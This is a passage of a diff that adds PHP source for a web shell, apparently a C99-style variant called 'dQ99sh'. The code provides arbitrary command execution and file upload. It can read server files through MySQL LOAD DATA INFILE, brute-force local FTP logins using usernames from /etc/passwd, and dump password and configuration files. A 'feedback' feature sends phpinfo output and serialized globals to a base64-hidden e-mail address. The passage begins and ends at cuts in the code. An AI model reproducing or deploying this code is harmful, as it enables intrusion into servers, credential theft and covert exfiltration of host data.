`".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." 
"; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
        Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
        "; + echo "[ Structure ]   "; + echo "[ Browse ]   "; + echo "[ Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

        Coming sooon!";} + if ($sql_tbl_act == "insert") { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) { } //Not Ready + else { + echo "

        Inserting row into table:
        "; + if (!empty($sql_tbl_insert_q)) { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

        ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
        "; + foreach ($tbl_struct_fields as $field) { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
        FieldTypeFunctionValue
        ".htmlspecialchars($name)."".$field["Type"]."

        "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

        "; + } + } + if ($sql_tbl_act == "browse") { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
        "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
        ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
        From:  To:  
        "; + echo "
        "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
        Action
        ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

         

        "; + } + } + else { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
        "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
        Table
        RowsTypeCreatedModifiedSizeAction
         ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
        +
        ".$i." table(s)
        ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

         

        "; + mysql_free_result($result); + } + } + } + } + } + else { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
        Create new DB:
         
        View File:
         
        "; + if ($sql_act == "newdb") { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
        ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
        Reason:
        ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
        Server-status variables:

        "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
        NameValue
        ".$row[0]."".$row[1]."
        "; + mysql_free_result($result); + } + if ($sql_act == "servervars") { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
        Server variables:

        "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
        NameValue
        ".$row[0]."".$row[1]."
        "; + mysql_free_result($result); + } + if ($sql_act == "processes") { + if (!empty($kill)) { + $query = "KILL ".$kill.";"; + $result = mysql_query($query, $sql_sock); + echo "Process #".$kill." was killed."; + } + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
        Processes:

        "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
        IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
        ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
        "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
        ";} + else {echo "File \"".$sql_getfile."\":
        ".nl2br(htmlspecialchars($f))."
        ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); + } + } + } +} +echo "
        \n";
+if ($sql_sock) {
+ $affected = @mysql_affected_rows($sql_sock);
+ if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+ echo "
        Affected rows : ".$affected."
        \n";
+}
+//End of SQL Manager
+if ($act == "ftpquickbrute") {
+echo "
        "; +echo "". + "". + "". + "". + "". + "
        "; +echo ".: Ftp Quick Brute :.
        "; +if ($win) { echo "Can't run on Windows!"; } +else { + function dQ99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) { + echo "Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
        "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else { + if ($fqb_logging) { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (".$sh_name.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) { + $str = explode(":",fgets($fp,2048)); + if (dQ99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
        "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
        Done!
        Total time (secs.): ".$ftpquick_t."
        Total connections: ".$i."
        Success.: ".$success."
        Unsuccess.:".($i-$success)."
        Connects per second: ".round($i/$ftpquick_t,2)."
        "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"".$sh_name." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else { + $logfile = $tmpdir_logs."dQ99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "
        ". + "Read first:
        Users only with shell
        Logging
        Logging to file:
        Logging to e-mail:
        "; + } + echo "
        "; +} +} +if ($act == "d") { + if (!is_dir($d)) { echo "
        $d is a not a Directory!
        "; } + else { + echo "Directory information:"; + if (!$win) { + echo "
        Owner/Group ";
+ $ow = posix_getpwuid(fileowner($d));
+ $gr = posix_getgrgid(filegroup($d));
+ $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+ }
+ echo "
        Perms".view_perms_color($d)."
        Create time ".date("d/m/Y H:i:s",filectime($d))."
        Access time ".date("d/m/Y H:i:s",fileatime($d))."
        MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."
        "; + } +} +if ($act == "phpinfo") {@ob_clean(); phpinfo(); dQ99shexit();} +if ($act == "security") { + echo "
        .: Server Security Information :.
        \n". + "\n". + "\n"; + echo "\n"; + echo ""; + + function displaysecinfo($name,$value) { + if (!empty($value)) { + echo "\n"; + } + } + if (!$win) { + displaysecinfo("OS Version",dQ99exec("cat /proc/version")); + displaysecinfo("Kernel Version",dQ99exec("sysctl -a | grep version")); + displaysecinfo("Distrib Name",dQ99exec("cat /etc/issue.net")); + displaysecinfo("Distrib Name (2)",dQ99exec("cat /etc/*-realise")); + displaysecinfo("CPU Info",dQ99exec("cat /proc/cpuinfo")); + displaysecinfo("RAM",dQ99exec("free -m")); + displaysecinfo("HDD Space",dQ99exec("df -h")); + displaysecinfo("List of Attributes",dQ99exec("lsattr -a")); + displaysecinfo("Mount Options",dQ99exec("cat /etc/fstab")); + displaysecinfo("lynx installed?",dQ99exec("which lynx")); + displaysecinfo("links installed?",dQ99exec("which links")); + displaysecinfo("GET installed?",dQ99exec("which GET")); + displaysecinfo("Where is Apache?",dQ99exec("whereis apache")); + displaysecinfo("Where is perl?",dQ99exec("whereis perl")); + displaysecinfo("Locate proftpd.conf",dQ99exec("locate proftpd.conf")); + displaysecinfo("Locate httpd.conf",dQ99exec("locate httpd.conf")); + displaysecinfo("Locate my.conf",dQ99exec("locate my.conf")); + displaysecinfo("Locate psybnc.conf",dQ99exec("locate psybnc.conf")); + } + else { + displaysecinfo("OS Version",dQ99exec("ver")); + displaysecinfo("Account Settings",dQ99exec("net accounts")); + displaysecinfo("User Accounts",dQ99exec("net user")); + } + echo "
        Open Base Dir".$hopenbasedir."
        Password File"; + if (!$win) { + if ($nixpasswd) { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
        "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
        From:  To:  

        "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) { + $uid = posix_getpwuid($i); + if ($uid) { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
        "; + } + $i++; + } + } + else {echo "Download /etc/passwd";} + } + else { + $v = $_SERVER["WINDIR"]."\repair\sam"; + if (!file_get_contents($v)) { echo "Download password file"; } + } + echo "
        Config Files\n"; + if (!$win) { + $v = array( + array("User Domains","/etc/userdomains"), + array("Cpanel Config","/var/cpanel/accounting.log"), + array("Apache Config","/usr/local/apache/conf/httpd.conf"), + array("Apache Config","/etc/httpd.conf"), + array("Syslog Config","/etc/syslog.conf"), + array("Message of The Day","/etc/motd"), + array("Hosts","/etc/hosts") + ); + $sep = "/"; + } + else { + $windir = $_SERVER["WINDIR"]; + $etcdir = $windir . "\system32\drivers\etc\\"; + $v = array( + array("Hosts",$etcdir."hosts"), + array("Local Network Map",$etcdir."networks"), + array("LM Hosts",$etcdir."lmhosts.sam"), + ); + $sep = "\\"; + } + foreach ($v as $sec_arr) { + $sec_f = substr(strrchr($sec_arr[1], $sep), 1); + $sec_d = rtrim($sec_arr[1],$sec_f); + $sec_full = $sec_d.$sec_f; + $sec_d = rtrim($sec_d,$sep); + if (file_get_contents($sec_full)) { + echo " [ ".$sec_arr[0]." ] \n"; + } + } + echo "
        ".$name."
        ".wordwrap($value,100)."
        \n";
+}
+if ($act == "mkfile") {
+ if ($mkfile != $d) {
+ if ($overwrite == 0) {
+ if (file_exists($mkfile)) { echo "FILE EXIST: $overwrite ".htmlspecialchars($mkfile); }
+ }
+ else {
+ if (!fopen($mkfile,"w")) { echo "ACCESS DENIED: ".htmlspecialchars($mkfile); }
+ else { $act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile); }
+ }
+ }
+ else { echo "
        Enter filename!
        \r\n"; } +} +if ($act == "encoder") { +echo "". + "
        ". + "". + "
        ". + "". + "". + ""; +foreach(array("md5","crypt","sha1","crc32") as $v) { + echo ""; +} +echo "". + "". + "". + "". + "". + "". + "". + "
        .: Encoder :.
        Input:
        ". + "
        Hashes:".$v.":
        Url:urlencode:
        urldecode:
        Base64:base64_encode:
        base64_decode:";
+if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "";}
+else {
+ $debase64 = base64_decode($encoder_input);
+ $debase64 = str_replace("\0","[0]",$debase64);
+ $a = explode("\r\n",$debase64);
+ $rows = count($a);
+ $debase64 = htmlspecialchars($debase64);
+ if ($rows == 1) { echo ""; }
+ else { $rows++; echo ""; }
+ echo " [Send to input]";
+}
+echo "
        Base convertations:dec2hex
        "; +} +if ($act == "fsbuff") { + $arr_copy = $sess_data["copy"]; + $arr_cut = $sess_data["cut"]; + $arr = array_merge($arr_copy,$arr_cut); + if (count($arr) == 0) {echo "

        Buffer is empty!

        ";} + else { + $dQ_infohead = "File-System Buffer"; + $ls_arr = $arr; + $disp_fullpath = TRUE; + $act = "ls"; + } +} +if ($act == "selfremove") { + if (($submit == $rndcode) and ($submit != "")) { + if (unlink(__FILE__)) { @ob_clean(); echo "Thanks for using ".$sh_name."!"; dQ99shexit(); } + else { echo "
        Can't delete ".__FILE__."!
        "; } + } + else { + if (!empty($rndcode)) {echo "Error: incorrect confirmation!";} + $rnd = rand(0,9).rand(0,9).rand(0,9); + echo "
        \n". + "". + "". + "Kill-shell: ".__FILE__."
        ". + "Are you sure? For confirmation, enter \"".$rnd."\" \n". + "\n"; + } +} +if ($act == "update") { + $ret = dQ99sh_getupdate(!!$confirmupdate); + echo "".$ret.""; + if (stristr($ret,"new version")) { + echo "

        "; + } +} +if ($act == "feedback") { + $suppmail = base64_decode("ZGhpZXF3ZWJtYXJrZXJAeWFob28uY29t"); + if (!empty($submit)){ + $ticket = substr(md5(microtime()+rand(1,1000)),0,6); + $body = $sh_name." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; + if (!empty($fdbk_ref)) { + $tmp = @ob_get_contents(); + ob_clean(); + phpinfo(); + $phpinfo = base64_encode(ob_get_contents()); + ob_clean(); + echo $tmp; + $body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; + } + mail($suppmail,$sh_name." feedback #".$ticket,$body,"FROM: ".$suppmail); + echo "
        Thanks for your feedback! Your ticket ID: ".$ticket.".
        "; + } + else { + echo "
        ". + "". + "". + "". + "". + "". + "
        ". + ".: Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail).") :.
        Your name:". + "
        Your e-mail:
        Message:
        ". + " Attach Server info (Recommended for bug-fix)
        ". + "*Language: English, Indonesian.
        \n"; + } +} +if ($act == "dQmailer") { + if (!empty($submit)){ + $headers = 'To: '.$dest_email."\r\n"; + $headers .= 'From: '.$sender_name.' '.$sender_email."\r\n"; + if (mail($suppmail,$sender_subj,$sender_body,$header)) { + echo "
        Email sent!
        "; + } + else { echo "
        Can't send email!
        "; } + } + else { + echo "
        ". + "". + "". + "". + "". + "". + "". + "
        ". + ".: $sh_name Mailer :.
        Your name:". + "
        Your e-mail:
        To:
        Subject:
        Message:
        ". + "
        \n";
+ }
+}
+if ($act == "search") {
+ echo "
        .: $sh_name File-System Search :.
        "; + if (empty($search_in)) {$search_in = $d;} + if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} + if (empty($search_text_wwo)) {$search_text_regexp = 0;} + if (!empty($submit)) { + $found = array(); + $found_d = 0; + $found_f = 0; + $search_i_f = 0; + $search_i_d = 0; + $a = array( + "name"=>$search_name, + "name_regexp"=>$search_name_regexp, + "text"=>$search_text, + "text_regexp"=>$search_text_regxp, + "text_wwo"=>$search_text_wwo, + "text_cs"=>$search_text_cs, + "text_not"=>$search_text_not + ); + $searchtime = getmicrotime(); + $in = array_unique(explode(";",$search_in)); + foreach($in as $v) {dQ99fsearch($v);} + $searchtime = round(getmicrotime()-$searchtime,4); + if (count($found) == 0) {echo "No files found!";} + else { + $ls_arr = $found; + $disp_fullpath = TRUE; + $act = "ls"; + } + } + echo "". + "". + "". + "". + "". + "". + "
        ". + "". + "File or folder Name:
          - Regular Expression
        Look in (Separate by \";\"):
        A word or phrase in the file:
        Regular Expression". + " Whole words only". + " Case sensitive". + " Find files NOT containing the text
        \n";
+ if ($act == "ls") {
+ $dspact = $act;
+ echo $searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).
        ". + "
        "; + } +} +if ($act == "chmod") { + $mode = fileperms($d.$f); + if (!$mode) {echo "Change file-mode with error: can't get current value.";} + else { + $form = TRUE; + if ($chmod_submit) { + $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); + if (chmod($d.$f,$octet)) { $act = "ls"; $form = FALSE; $err = ""; } + else {$err = "Can't chmod to ".$octet.".";} + } + if ($form) { + $perms = parse_perms($mode); + echo "Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")
        ".($err?"Error: ".$err:"")."
        Owner

         Read
         Write
        eXecute
        Group

         Read
         Write
        eXecute
        World

         Read
         Write
        eXecute
        "; + } + } +} +if ($act == "upload") { + $uploadmess = ""; + $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); + if (empty($uploadpath)) {$uploadpath = $d;} + elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;} + if (!empty($submit)) { + global $_FILES; + $uploadfile = $_FILES["uploadfile"]; + if (!empty($uploadfile["tmp_name"])) { + if (empty($uploadfilename)) {$destin = $uploadfile["name"];} + else {$destin = $userfilename;} + if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) { + $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!
        "; + } + else { $uploadmess .= "File uploaded successfully!
        ".$uploadpath.$destin; } + } + else { echo "No file to upload!"; } + } + if ($miniform) { + echo "".$uploadmess.""; + $act = "ls"; + } + else { + echo "". + "". + "". + "". + "". + "". + "". + "
        ". + ".: File Upload :.".$uploadmess."
        ". + "From Your Computer:
        From URL:
        Target Directory:
        Target File Name:
        Convert file name to lowercase
        ". + "
        "; + } +} +if ($act == "delete") { + $delerr = ""; + foreach ($actbox as $v) { + $result = FALSE; + $result = fs_rmobj($v); + if (!$result) { $delerr .= "Can't delete ".htmlspecialchars($v)."
        "; } + } + if (!empty($delerr)) { echo "Error deleting:
        ".$delerr; } + $act = "ls"; +} +if (!$usefsbuff) { + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) { + echo "
        Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.
        "; + } +} +else { + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); dQ99_sess_put($sess_data); $act = "ls"; } + elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); dQ99_sess_put($sess_data); $act = "ls";} + elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} dQ99_sess_put($sess_data); $act = "ls";} + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); dQ99_sess_put($sess_data);} + elseif ($actpastebuff) { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) { + $to = $d.basename($v); + if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!
        ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) { + $to = $d.basename($v); + if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!
        ";} + unset($sess_data["cut"][$k]); + } + dQ99_sess_put($sess_data); + if (!empty($psterr)) {echo "Pasting with errors:
        ".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} + $cmdline .= " ".$actarcbuff_path; + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) { + $v = str_replace("\\",DIRECTORY_SEPARATOR,$v); + if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} + if (is_dir($v)) { + if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $tmp = realpath("."); + chdir($d); + $ret = dQ99exec($cmdline); + chdir($tmp); + if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!
        ";} + $ret = str_replace("\r\n","\n",$ret); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + dQ99_sess_put($sess_data); + if (!empty($arcerr)) {echo "Archivation errors:
        ".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!
        ";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!
        ";} + unset($sess_data["cut"][$k]); + } + dQ99_sess_put($sess_data); + if (!empty($psterr)) {echo "Error pasting:
        ".$psterr;} + $act = "ls"; + } +} +if ($act == "cmd") { + @chdir($chdir); + if (!empty($submit)) { + echo "
        .: Results of Execution :.
        \n"; + $olddir = realpath("."); + @chdir($d); + $ret = dQ99exec($cmd); + $ret = convert_cyr_string($ret,"d","w"); + if ($cmd_txt) { + $rows = count(explode("\n",$ret))+1; + if ($rows < 10) { $rows = 10; } else { $rows = 30; } + $cols = 130; + echo "\n"; + //echo "
        ".htmlspecialchars($ret)."
        "; + } + else { echo $ret."
        "; } + @chdir($olddir); + } +} +if ($act == "ls") { + if (count($ls_arr) > 0) { $list = $ls_arr; } + else { + $list = array(); + if ($h = @opendir($d)) { + while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} + closedir($h); + } + } + if (count($list) == 0) { echo "
        Can't open folder (".htmlspecialchars($d).")!
        ";} + else { + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";} + elseif (is_dir($v)) { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Date Modified"; + if (!$win) {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = " "; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = 
array(); + $i = 0; + foreach ($objects as $a) { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) { + if (ereg($r[0],$o)) { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; dQ99shexit();} + else { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") { + $row[] = " ".$o.""; + $row[] = "CURDIR"; + } + elseif ($o == "..") { + $row[] = " ".$o.""; + $row[] = "UPDIR"; + } + elseif (is_dir($v)) { + if (is_link($v)) { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = @date("d.m.Y 